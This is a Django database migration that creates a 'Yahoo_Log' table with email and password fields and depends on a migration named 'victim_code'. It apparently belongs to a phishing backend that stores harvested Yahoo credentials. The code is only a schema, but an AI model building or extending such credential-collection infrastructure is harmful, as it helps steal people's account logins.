# Generated by Django 4.0.4 on 2022-11-13 06:45

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0002_victim_code'),
    ]

    operations = [
        migrations.CreateModel(
            name='Yahoo_Log',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mail', models.CharField(max_length=260)),
                ('psw', models.CharField(max_length=260)),
            ],
        ),
    ]
